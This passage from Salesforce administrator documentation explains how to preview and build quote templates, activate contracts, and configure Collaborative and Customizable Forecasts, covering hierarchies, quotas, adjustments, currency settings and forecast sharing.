Viewing and Editing Quote Templates

Previewing Quote Templates
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

Preview your quote templates to make sure the quote PDFs users create will look the way you want them to.

Note:  Preview shows templates in system administrator profile view. The preview and the template show any rich
text and images you've added. Other data is simulated.

Text fields displayed in a related list in a quote PDF are truncated to less than 256 characters. This limitation occurs
on rich text area fields, other types of text fields, standard fields, and custom fields.

1. Open the template you want to preview. Edit the template if you need to.
2. Click Save and Preview.

Important: Save and Preview saves changes to your template, so after you preview, you can't undo them.

3. In the Template Preview overlay, verify that the content and layout are correct.
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4. Click Close.

See Also:
Quote Templates Overview

Tips for Using Quote Templates
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

Upgrading Quote Templates from the Summer '10 Beta Release

If you used quote templates during the Summer '10 beta release, you'll notice a change in how template logos and
signature blocks work. The first time you create a template in the Winter '11 release, if you add any content to the header
or footer, the logo and signature block you previously used won't be displayed. If the new template's header and footer
have no content, the original logo and signature block will appear.

Understanding Template Field Names

To help you understand the information you'll get when you select fields for your template, some field names provide
additional information that does not appear on PDFs created from the template.

PDF Field NameTemplate Field NameObject FieldObject

Prepared ByPrepared By (Name)First Name, Last NameUser

E-mailPrepared By (Email)EmailUser

PhonePrepared By (Phone)PhoneUser

FaxPrepared By (Fax)FaxUser

Company AddressOrganization
(Address)

AddressCompany Information

Created DateQuote PDF (Created
Date)

Hidden. The date the PDF
was generated and saved in
the quote documents object.

Quote Documents

Creating a Totals Section

Use a totals section to show grand total amounts for your quote.
1. Create the section. You have a couple of options.
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Select Standard Template when you create a new template. The standard template contains a totals section,
and you can modify it as you wish.

•

• Drag a section onto the layout of any template, then drag total-related fields (such as Subtotal and Grand
Total) to the right half of the section. Hide the title if you are placing the section directly beneath a list.

2. Click  and select right field alignment.

Note:  Fields within sections have different alignment than columns within lists, so if you place your totals
section beneath a list, its field values will not line up beneath the rightmost list values.

For example, your template might include a list of quote line items, including a Total Price column at the
far right that shows the total for each line item. If you add a totals section beneath the list, and include Subtotal,
Total Price, and Grand Total fields, their values will show the total of all line items, but the amounts
will not line up beneath the list's Total Price column.

Creating a Signature Block

Use a signature block to create signature and date lines so your customers can sign off on their quotes.
1. Drag a Text/Image Field into the footer of your template. Use two columns for the footer if you want to right-align

your signature block or create two.
2. Enter a label for each line you want to create. For example:

• Signature
• Name
• Title
• Date

3. Use the underscore key to create a line after each label.
4. Click OK.

Hiding Field Labels

You can show field content without labels in quote template sections, headers, and footers. Just click  and select the
Hide checkbox. Field names appear in gray on the quote template editor, but they don't appear on quote PDFs. Click
Save and Preview to see how PDFs will look.

Sandbox Restrictions for Quote Templates

If you create a configuration-only sandbox for your organization, templates that contain Text/Image fields cannot be
opened for editing within the sandbox.

See Also:
Quote Templates Overview
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ACTIVATING SALES CONTRACTS

Activating Contracts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Activate Contracts”

AND

“Read” and “Edit” on contracts

To activate contracts:

Administrators and users with the “Activate Contracts” permission can activate contracts. To edit an activated contract, a user
must have the “Activate Contracts” permission.

Activating a contract changes the contract status to Activated and makes the contract read only. Activated contracts cannot
be changed and only users with the “Delete Activated Contracts” permission can delete a contract with Activated status. To
activate a contract:

1. Select the contract you want to activate.
2. Click Activate. The status of an activated contract is “Activated.”

See Also:
Approving Contracts
Displaying and Editing Contracts
Contracts Overview
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CONFIGURING COLLABORATIVE FORECASTS

Setting Up Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Important:

• This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).
• For Forecasts features to function correctly, don’t disable the new user interface theme for your organization.

Additionally, Territory Management and custom fiscal years must not be enabled.
• For best viewing results, keep the Tab Bar Organizer enabled when using Forecasts.

If your organization is migrating to Collaborative Forecasts, see Planning Your Migration from Customizable Forecasting to
Forecasts on page 1168. To set up the forecasts feature, you need to:

• Enable users who need to use forecasts.
• Set up your forecasts hierarchy to determine how forecasts roll up within your organization and who can view and adjust

them. To do this, from Setup, click Customize > Forecasts > Forecast Hierarchy.
• Enable quotas to make this functionality available in your organization.
• Enable forecasts adjustments for your organization and for specific user profiles to make this functionality available in your

organization.
• Define your forecast range. You can select the period and default range for your organization.
• Enable the data source you want to use.
• Customize your forecast categories if your organization uses specific terminology.
• Select the fields that appear in the opportunity pane
• Set a forecast currency if your organization uses multiple currencies. You can select either your organization's corporate

currency or the forecast owner's personal currency.
• Make sure the Forecasts tab is visible to forecasting users.

See Also:
Forecasts Overview
Defining Forecasts Settings
Disabling Forecasts Functionality

1572

Setting Up ForecastsConfiguring Collaborative Forecasts



Defining Forecasts Settings
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

“Customize Application”

AND

“Manage Quotas”

To manage quotas:

Important:

• This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).
• For Forecasts features to function correctly, don’t disable the new user interface theme for your organization.

Additionally, Territory Management and custom fiscal years must not be enabled.
• For best viewing results, keep the Tab Bar Organizer enabled when using Forecasts.

If you're an existing organization using Forecasts (Classic) or Customizable Forecasts and want to use Forecasts, contact your
salesforce.com representative.

Additionally, salesforce.com recommends that you review the documentation prior to setting up Forecasts. If you later change
certain settings, you can lose some data.

For a more detailed step-by-step explanation of setting up Forecasts and why you’d want to enable certain functionality, see
the Forecasts Administrator's Workbook.

1. From Setup, click Customize > Forecasts > Settings. If forecasts is not already enabled, select Enable Forecasts.
2. Select the data source that you want to use.
3. Under Forecast Range, use the drop-down lists to select a beginning period and the number of periods you want to display.*
4. If you need to, customize your Forecast Categories.
5. Select the fields that appear in the opportunity pane of a forecast page.
6. Optionally, enable quotas for your organization.
7. Optionally, enable forecasts adjustments for your organization and for specific users.*
8. If your organization uses multiple currencies, select the currency in which your users will forecast.
9. Click Save.

Now you can enable users who need to use forecasts and set up your forecasts hierarchy to determine how forecasts roll up
within your organization, and who can view and adjust them.
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* You can always return to the Forecasts Settings page to make changes. However, if you later disable adjustments, adjustment
data is purged; if you change your period or data source settings, both quota and adjustment data is purged.

See Also:
Forecasts Overview
Setting Up Forecasts
Disabling Forecasts Functionality

Enabling Users for Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

1. From Setup, click Manage Users > Users.
2. For each user you want to enable, click Edit.
3. Under General Information, select Allow Forecasting.
4. Click Save.

Enabled users are available in the forecasts hierarchy.

You can also enable additional users or disable users you've already enabled when you configure your forecast hierarchy.

See Also:
Forecasts Overview
Enable Partner Portal Users to Add Forecasts Opportunities
Setting Up Forecasts
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Enable Partner Portal Users to Add Forecasts Opportunities
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

“Customize Application”To assign partner profiles to partner portals:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Before beginning, make sure that you’ve:

• Enabled partner portals for your organization and created a partner portal.
• Created a partner profile and assigned it to your partner portal.
• Enabled an account as a partner and enabled partner portal login for a contact of that account.

If your organization works with partners, you can include the figures from partner user opportunities in users’ forecasts. Follow
these steps to add partner portal users to the forecast hierarchy.

1. From Setup, click Manage Users > Users and select the partner portal contact you created.
2. Make sure that the Active and Allow Forecasting checkboxes are selected.
3. Enable the partner portal user in the forecast hierarchy and make sure the person is assigned to an active forecast manager.

Opportunities that a partner portal user creates can roll up to the forecast of the account owner; note that the account owner
must be the person’s forecast manager in the forecast hierarchy for the opportunities to roll up into the forecast. For example,
say Gordon Johnson:

• Owns a partner account called Acme
• Has an Acme contact named Anne Smith
• Anne is a partner portal user
• Anne reports to Gordon in the forecasts hierarchy

If Anne adds opportunities in her portal, Gordon sees those opportunities in his forecast; because Gordon is Anne’s forecast
manager, Gordon can adjust forecast amounts based on her opportunities and see how she’s tracking against her quota.
However, it’s important to note that partner portal users don’t have access to the Forecasts tab or any of its functionality.

See Also:
Forecasts Overview
Setting Up Forecasts
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Setting Up Your Forecast Hierarchy
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

When you assign a user as a forecast manager, all forecasts and adjustments from the manager's subordinates in the hierarchy
roll up into his or her forecasts. It's important to always assign a forecast manager to the top level of the forecast hierarchy.

1. From Setup, click Customize > Forecasts > Forecast Hierarchy. Click Expand All to see the roles available in your
organization.

2. Click Enable Users and click Add and Remove to move users between the Available Users list and the Enabled Users list.
If you previously enabled a user from Setup by clicking Manage Users > Users and editing a user page to allow forecasting,
the name already appears in the Enabled Users list.

3. If you need to select a forecast manager for each manager role in the hierarchy, click Edit Manager next to the role, then
select a name from the Forecast Manager drop-down list.

4. Click Save.

If your organization needs to adjust forecasts, enable adjustments next.

See Also:
Forecasts Overview
Enabling Forecasts Adjustments
Enabling Users for Forecasts
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Enabling Quotas in Forecasts
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

“Customize Application”

AND

“Manage Quotas”

To manage quotas:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

A quota is the sales goal assigned to a user on a monthly or quarterly basis. A manager’s quota equals the amount the manager
and team are expected to generate together. The roll up is done manually by users and managers, and either data source–revenue
or quantity—can be used. Follow these steps to enable quotas for Forecasts in your organization:

1. From Setup, click Customize > Forecasts > Settings.
2. Under Quotas, select Show Quotas.
3. Click Save.

Quota data must be loaded through the API using version 25.0 or later. (If you use quantity as your data source, quantity
quota information is available using API version 28.0 or later.) Consider using the Data Loader for this task. For example,
you might have a .csv file with column names such as User ID, Quota Amount, Currency Code, and Month [YYYY-MM-DD].

Map these columns to the QuotaOwnerId, QuotaAmount (or QuotaQuantity), CurrencyIsoCode, and StartDate
fields in the ForecastingQuota object and use the Data Loader to upload your quota information to Salesforce. See Data
Loader Overview on page 485 for more details about Data Loader.

As a best practice, load quota data in the quota owner’s personal currency. Note that you can still upload quota data using the
API even if Show Quotas is disabled. If your Data Loader time zone setting is ahead of quota owners’ time zones, the month
can be off by one. To avoid this problem, use a date greater than or equal to the third day of each month when inserting quotas.
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Note:  If you disable Forecasts, quotas are also disabled. Additionally, if you disable a data source, related quotas are
purged.

See Also:
Forecasts Overview
Setting Up Forecasts

Enabling Forecasts Adjustments
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Before enabling adjustments, make sure you've set up your forecast hierarchy.

1. From Setup, click Customize > Forecasts > Settings.
2. Under Adjustments, select Enable Adjustments.
3. Click Save.
4. From Setup, click Manage Users > Profiles.
5. Find a profile for which you want adjustments enabled.
6. If you’re using the enhanced profile user interface, click App Permissions and click Edit.
7. Select Override Forecasts and click Save.

See Also:
Forecasts Overview
Forecasts Adjustments Overview
Setting Up Forecasts
Defining Your Organization's Forecast Date Range

1578

Enabling Forecasts AdjustmentsConfiguring Collaborative Forecasts



Disabling Forecasts Adjustments
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Warning:  Disabling forecasts adjustments purges existing adjustments. Before disabling adjustments, see Understanding
Adjustments Purges. Since disabling functionality can result in purged data, consider exporting your data before
disabling anything. When you complete your setting changes, you can import the data back into Salesforce.

1. From Setup, click Customize > Forecasts > Settings.
2. Under Adjustments, deselect Enable Adjustments.
3. Click Save. You don't need to update user permissions because adjustments are now disabled for your entire organization.

Say you have forecast managers who adjusted forecast amounts for some direct reports. After you disable adjustments for your
organization, the next time the managers view their respective forecast rollups, no adjustments will appear.

Selecting a Forecast Currency
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Before selecting a forecast currency, review information in Working With Multiple Currencies in Forecasts.

1. From Setup, click Customize > Forecasts > Settings.
2. Under Forecast Currency, choose a forecast currency option.
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3. Click Save.

See Also:
Forecasts Overview
Forecasts Adjustments Overview

Enabling Data Sources for Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Data source refers to the type of data used for forecasting. Depending on an organization’s settings, quantity- or revenue-based
data sources, or both, can be used. Quantity forecasts roll up based on the opportunity’s quantity field while revenue forecasts
roll up based on the opportunity’s amount field.

1. From Setup, click Customize > Forecasts > Settings.
2. Under Data Source, select Revenue, Quantity, or both.

Note:  If you disable a revenue or quantity option after it’s been selected, all related quota and adjustment information
is purged.

See Also:
Forecasts Overview
Setting Up Forecasts
Selecting Fields that Appear in the Forecasts Opportunity Pane

1580

Enabling Data Sources for ForecastsConfiguring Collaborative Forecasts



Defining Your Organization's Forecast Date Range
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

The Forecasts rollup table displays forecast amounts for individual months or quarters and a range of months or quarters,
depending on the organization’s Forecasts settings. Six months or four quarters is the default. Users can forecast up to 12
months or eight quarters in the future or past. In the forecasts page, the period selected by default in the rollup table is the
current month or quarter if the forecast range includes the current month or quarter. If not, then the first month or quarter
is selected by default in the rollup table instead. The forecast date range for the organization becomes the default for all
Forecasts users. Users can use this default or they can set a different date range display for their own forecasts. Once users
change their individual forecast date range displays, administrators can’t override them. However, when changing the period
display from monthly to quarterly or quarterly to monthly, the change is reflected in users’ forecasts.

Important:  If you change the period setting from monthly to quarterly or quarterly to monthly, all adjustments and
quotas are lost.

1. From Setup, click Customize > Forecasts > Settings.
2. Under Forecast Range, use the drop-down lists to select a beginning period and the number of periods you want to display.
3. Click Save.

See Also:
Forecasts Overview
Setting Up Forecasts
Changing Your Forecast Date Range Display
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Selecting Fields that Appear in the Forecasts Opportunity
Pane

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To customize the opportunity pane:

“View Setup and Configuration”To view setup and configuration:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Tip:  If you add an opportunity field to the opportunity pane and it's not visible to Forecasts users, check the field-level
security setting for the specific profile and field.

Opportunities appear below the rollup table in a forecast in a list that responds to user selections. Administrators select up to
15 standard and custom fields that appear in the opportunity pane. Users see the fields selected based on their field level security
settings. Opportunity Name is a required field. Additionally, salesforce.com recommends adding Forecast Category
to the pane. Quantity forecasts roll up based on the opportunity’s quantity field while revenue forecasts roll up based on the
opportunity’s amount field. Depending on the data source you use, consider adding Forecast Amount, Forecast Quantity,
or both to the pane.

1. From Setup, click Customize > Forecasts > Settings.
2. Under Opportunity List Column, select fields and click Add and Remove to move them between the Available Fields list

and the Selected Fields list. To determine field order in the layout, select fields and click Up, Down, Top, or Bottom.
3. Click Save.

See Also:
Forecasts Overview
Setting Up Forecasts
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Customizing Forecasts Categories
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”

AND

“Customize Application”

To enable Forecasts users:

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

A forecast category is the category within the sales cycle that an opportunity is assigned to based on its opportunity stage. The
standard forecast categories are Pipeline, Best Case, Commit, Omitted, and Closed. You can customize forecast category
names for your organization. The forecast categories display information for that specific category; for example, Best Case
only reflects amounts in the Best Case category.

1. From Setup, click Customize > Opportunities > Fields.
2. Click Forecast Category.
3. Click Edit for any value you want to edit in the Forecasts Category Picklist Values.
4. Enter a forecast category name.
5. Click Save.

New forecast category names appear on opportunity records and forecasts.

See Also:
Forecasts Overview
Setting Up Forecasts

Disabling Forecasts Functionality
Available in: Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Collaborative Forecasts and not to Customizable Forecasts or Forecasts (Classic).

Before disabling Forecasts or any of its functionality, be sure you understand how your forecast data will be affected.

Tip: Since disabling functionality can result in purged data, consider exporting your data before disabling anything.
When you complete your setting changes, you can import the data back into Salesforce. Note that if you change your

1583

Customizing Forecasts CategoriesConfiguring Collaborative Forecasts



period setting from monthly to quarterly or quarterly to monthly, you cannot import your quota or adjustments data
back into Salesforce because the existing values will not align with your new periods.

These items are purged...If you disable...

Adjustments

Note that your forecast hierarchy stays in place.

Forecasts

AdjustmentsAdjustments

Quotas and adjustmentsThe monthly period setting to use quarterly periods

OR

The quarterly period setting to use monthly periods

Quotas and adjustments for the revenue-based data sourceThe revenue-based data source

Quotas and adjustments for the quantity-based data sourceThe quantity-based data source

When adjustments are purged from forecasts, the underlying data on which the forecasts are based remains untouched.

See Also:
Forecasts Overview
Defining Forecasts Settings

CONFIGURING CUSTOMIZABLE FORECASTS

Setting Up Customizable Forecasting
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Sales forecasts represent the best estimate of how much revenue you can generate. They give your managers and executives a
view of your overall business no matter how dispersed your sales teams are.

Because forecasting is so universal, customizable forecasting is a flexible solution for even the most advanced requirements.
Get started using customizable forecasting in Setup by clicking Customize > Forecasts (Customizable):

• Click Edit Forecast settings for your company to customize the default settings for your organization. See Defining
Customizable Forecast Settings.
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• Click Batch submit forecasts for your users to set up batch submission. See Submitting Customizable Forecasts in Batches.

• Click Set up the forecasting hierarchy for your company to set up your initial forecast hierarchy. Refer to Setting Up
Your Forecast Hierarchy.

See Also:
Submitting Customizable Forecasts in Batches
Using Product Families
Administrator tip sheet: Setting Up Customizable Forecasting

Defining Customizable Forecast Settings
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To define forecast settings:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Define the following settings for your organization:

• Forecast Data Aggregation determines the type of data that is displayed on forecasts.

• Forecast Summary Default View determines the default product family, date start, date range, and forecast numbers for
default forecasts.

• Forecast Data Sharing determines whether forecast data can be shared.

To set forecast options:

1. From Setup, click Customize > Forecasts (Customizable) > Settings.
2. Select Forecast Revenue if you want forecasts to include revenue amount. If you disable this setting, you will lose all

revenue overrides on your forecasts.
3. Select Forecast Quantity if you want forecasts to include quantity totals. If you disable this setting, you will lose all

quantity overrides on your forecasts.
4. Choose a Forecast Period. If you do not have custom fiscal years enabled, choose monthly or quarterly depending on

your organization’s forecasting cycle. Note that the month or quarter start date is based on Greenwich Mean Time (GMT).
If you have enabled custom fiscal years, you can choose to forecast by fiscal period or by fiscal quarter. The forecast period
you choose determines the time increment your organization uses for quotas and forecasts. If you choose monthly, you can
still see totals by quarters but, if you choose quarterly, monthly forecast totals are not available. If you change this setting,
you will lose all overrides and forecasts, including all forecast history.

5. Choose a Forecast Date that determines how opportunity amounts contribute to forecasts:

• Choose Opportunity Close Date if you want the entire opportunity amount to contribute to the forecast period
for that date. If your organization does not use products, this is the only option available.
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• Choose Product Date if you want the amount of the product on the opportunity to contribute to the forecast period
that corresponds with the Product Date. When no products exist on an opportunity or the product date is blank,
Salesforce uses the Opportunity Close Date in the user’s forecast instead.

• Choose Schedule Date if you want the individual revenue schedule amounts to contribute to the forecast periods
that correspond with the schedule dates. If a product does not have a revenue schedule, Salesforce uses the Product
Date in the user’s forecast instead.

6. Choose a Forecast Type that determines how many forecasts your users will submit in a period:

• Choose Use Overall Forecast if your organization does not use products. Your users will have one forecast and
one quota for each period. If your organization does not use products, this is the only option available.

• Choose Use Product Families if your users have one quota and one forecast for each product family. See Using
Product Families.

7. Choose a default view for your users. This setting determines what forecast product family, date start, date range, and
forecast totals to display for users when they first click the Forecasts tab. Users can change their view but the default remains
the same for all users.

8. Enable or disable forecast sharing by selecting or deselecting Enable Forecast Sharing.
9. Click Save.

If you have enabled forecast sharing, you are prompted to choose who can share existing forecast views. The options are:

• Require Administrator assistance for forecast sharing - Only administrators can share existing
forecast data.

• Forecast managers can share their own forecast data - Administrators can share existing forecast
data, and existing forecast managers can also share their own views.

Note:  This choice applies to existing forecasting views only; it is not a default setting for your organization. Each
time you edit or assign a forecast manager in the role hierarchy, you must define who can share that view.

If you have chosen to disable forecast sharing, you are prompted to confirm your choice.

Report builder doesn’t support Customizable Forecasts.

See Also:
Setting Up Customizable Forecasting
Manually Sharing a Forecast
Setting Your Fiscal Year
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Setting Your Fiscal Year
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set fiscal year:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Your fiscal year determines your monthly or quarterly forecasting cycle, the month it starts, and whether the Fiscal Year
is named for the starting or ending year. For example, if your fiscal year starts in April 2005 and ends in March 2006, your
fiscal year setting can be either 2005 or 2006.

To set your fiscal year for customizable forecasting:

1. Begin by archiving your data first because changing your fiscal year settings affects your opportunity and forecast data. We
recommend running and exporting the following reports:

• Opportunity Pipeline
• Quarterly Forecast Summary
• Quota vs Actual

2. From Setup, click Customize > Forecasts (Customizable) > Fiscal Year.
3. Choose a Forecast Period of monthly or quarterly depending on your organization’s forecasting cycle. Note that the

month or quarter start date is based on Greenwich Mean Time (GMT).

The forecast period you choose determines the time increment your organization uses for quotas and forecasts. If you
choose monthly, you can still see totals by quarters but, if you choose quarterly, monthly forecast totals are not available.

4. Choose a Fiscal Year Start Month that represents the beginning of your organization’s fiscal year.
5. Select a Fiscal year is based on option that represents how your organization refers to a fiscal year. For example,

if your fiscal year starts in April 2004 and ends in March 2005 but is called Fiscal Year 2005, choose The ending month
because the last month determines how your organization refers to that fiscal year.

6. Do not check Apply to all forecasts and quotas unless you want to change the fiscal year settings of forecasts
created before you enabled customizable forecasts. Checking this option changes your historical forecast data.

7. Click Save.

See Also:
Setting Up Customizable Forecasting
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Setting Up Your Forecast Hierarchy
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up forecast hierarchy:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Your forecast hierarchy lists each user that can use customizable forecasting. It determines how forecasts roll up through your
hierarchy. It is based on the role hierarchy by default, or the territory hierarchy if your organization has territory management.

When customizable forecasting is enabled for your organization, it automatically generates a forecast hierarchy based on your
organization’s role hierarchy. The forecast hierarchy becomes based on your territory hierarchy only when you enable territory
management. To customize your forecast hierarchy:

• Make sure that all the appropriate users are in your forecast hierarchy. If any are not and should be, see Enabling Users
for Customizable Forecasting.

• Make sure that the appropriate users are the assigned forecast manager whenever there is more than one user in a role or
territory in your forecast hierarchy. Each user at the bottom of your forecast hierarchy can be a forecast manager. However,
above that, a single user must be chosen as the forecast manager for forecasts to roll up to that user. See Assigning Forecast
Managers in Your Forecast Hierarchy.

• Share forecast manager views with other users. See Manually Sharing a Forecast.

If Nonforecasting appears next to a role or territory in the forecast hierarchy, it means that a forecast manager has not
been assigned to that role or territory.

See Also:
Setting Up Customizable Forecasting
Setting Up Your Forecast Hierarchy
Manually Sharing a Forecast
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Enabling Users for Customizable Forecasting
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up forecast hierarchy:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

To enable users for customizable forecasting if your organization does not use territory management:

1. From Setup, click Customize > Forecasts (Customizable) > Forecast Hierarchy.
2. Click Enable Users next to a role to view a list of users assigned to that level.
3. Select a user and click Add to enable the user for customizable forecasting. To disable a user, select the user and click

Remove.
4. Click Save.

To enable a user for customizable forecasting if your organization uses territory management:

1. From Setup, click Customize > Users.
2. Click Edit next to the user's name.
3. Select Allow Forecasting.
4. Click Save.
5. Add the user to a territory.

Report builder doesn’t support Customizable Forecasts.

Note:  To view a list of users for a territory, select the territory name in the territory hierarchy or run a territory report.
For more information on territory reports, see Territory Reports.

If you add more than one user to a role or territory, make sure that the appropriate user is the assigned forecast manager
for that role or territory. See Assigning Forecast Managers in Your Forecast Hierarchy

See Also:
Setting Up Customizable Forecasting
Setting Up Customizable Forecasting
Enabling Territory Management
Manually Sharing a Forecast
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Assigning Forecast Managers in Your Forecast Hierarchy

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To set up forecast hierarchy:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

After users are enabled for customizable forecasting, assign a user as a forecast manager for each role in your forecast hierarchy.
Assigning someone as a forecast manager means that all forecasts from users below that user in the forecast hierarchy roll up
to that person. For example, an executive and executive assistant may have the same role, but the executive is the assigned
forecast manager in the forecast hierarchy because all subordinates' forecasts roll up to the executive. Both the executive and
executive assistant can submit forecasts, but forecasts of other users do not roll up to the executive assistant.

If a role in the forecast hierarchy has no forecast manager, that role and all its subordinate roles are not included in your
forecasts.

If Nonforecasting appears next to a role or territory in the forecast hierarchy, it means that a forecast manager has not
been assigned to that role or territory.

1. From Setup, click Customize > Forecasts > Forecasts (Customizable).
2. Click Assign Manager or Edit Manager next to a role to assign a user as the forecast manager of that role.

Roles without roles below them cannot have forecast managers unless your organization has territory management, which
supports forecast managers at all levels.

3. Choose a user to be assigned as the forecast manager of the selected role. If no users are available for the role, enable the
appropriate user; see Enabling Users for Customizable Forecasting.

4. If forecast sharing is enabled, choose the sharing settings:

• Choose Require Administrator assistance for forecast sharing to limit forecast sharing for this view
to administrators. This is the default option.

• Choose Forecast managers can share their own forecast views to allow the administrator or the
forecast manager to share this view.

5. Click Save.

See Also:
Setting Up Customizable Forecasting
Setting Up Your Forecast Hierarchy
Manually Sharing a Forecast
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Enabling Customizable Forecasting
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable customizable forecasts:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Enabling customizable forecasting for your organization allows your forecast users to view and submit their customizable
forecasts from the Forecasts tab based on your customizable forecast settings. Report builder doesn’t support Customizable
Forecasts.

1. From Setup, click Customize > Forecasts (Customizable) > Forecast Hierarchy.
2. Click Enable Customizable Forecasting. If this option is not available, customizable forecasting is already enabled for

your organization. After you enable customizable forecasting, three new user permissions are available:

DescriptionPermission

Allows users to override their own forecasts and forecasts
for users below them in the forecast hierarchy. All standard
profiles except Read Only receive this permission.

Override Forecasts

Allows users to change their individual quotas. All standard
profiles except Read Only receive this permission.

Users with the “Manage Users” permission can always edit
any quota. Users can always edit the quotas of users that
report directly to them.

Edit Personal Quota

Allows users to view any forecast regardless of their place in
the forecast hierarchy. The System Administrator profile
includes this permission.

View All Forecasts

3. Choose the appropriate opportunity page layouts that you want to include the new Opportunity Forecasts related list.
Optionally, choose the Append... option to add this related list to page layouts even if users have customized them.

4. Click Save.
5. Enable or disable these permissions where necessary..
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Note:  With customizable forecasts, your forecasts still depend on how your Opportunity Stage picklist values
map to Forecast Categories.

See Also:
Setting Up Customizable Forecasting
Enabling Territory Management
Manually Sharing a Forecast

Manually Sharing a Forecast
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Your administrator defines your organization's forecasting hierarchy, which determines which users can view the forecast data.
However, your administrator can manually extend sharing privileges for forecast data, and you may be able to manually extend
sharing privileges for your own forecast data as well. Manual forecast sharing can only increase access to forecast data; it cannot
restrict access for users who already have access. To manually share a forecast, you must be an administrator or a forecast
manager who has been given access to share your forecast data.

To see which users can view your forecast or to share your forecast data, do one of the following:

• From Setup, click Customize > Forecasts > Forecast Hierarchy, then click Share next to the view you want to share.

• Click Sharing on the forecast home page to share your own forecast data.

The User and Group Sharing list shows you all the users who currently have access to this forecast data. It also details the level
of access they have, whether they can submit a forecast, and the reason they have that access. The reasons a user might have
access to forecast data are:

DescriptionReason

The user is an administrator, or has the “Modify All Data”
permission.

Administrator

A user has access to forecast data that was granted via the
Sharing button on the forecast.

Delegated Forecast Manager

A user has access due to being a forecast manager in the
forecast hierarchy.

Forecast Manager

The owner can always see his or her own forecast data.Owner

The user has the “View All Forecasts” permission.View All Forecasts Permission

On the Forecast Sharing Detail page, you can do any of the following:
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• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Click Add to grant other users or groups access to the forecast data.

Note:  Manual sharing extends to the opportunity data that makes up the forecast. If a user has permission to
override forecast data, then the user also has permission to override the opportunity forecast data.

• Click Expand List to view all users that have access to the forecast data.

• For manual sharing rules that you created, click Edit or Del next to an item in the list to edit or delete the access level.

See Also:
Defining Customizable Forecast Settings
Setting Up Customizable Forecasting

Submitting Customizable Forecasts in Batches
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Modify All Data”To submit forecasts in batches:

Note:  This information applies to Customizable Forecasting and not Collaborative Forecasts or Forecasts (Classic).

Submitting forecasts takes a snapshot of forecast data and makes that data available in forecast history and reports. Users can
submit their forecasts individually by clicking Submit from their forecast.

To submit multiple forecasts at once:

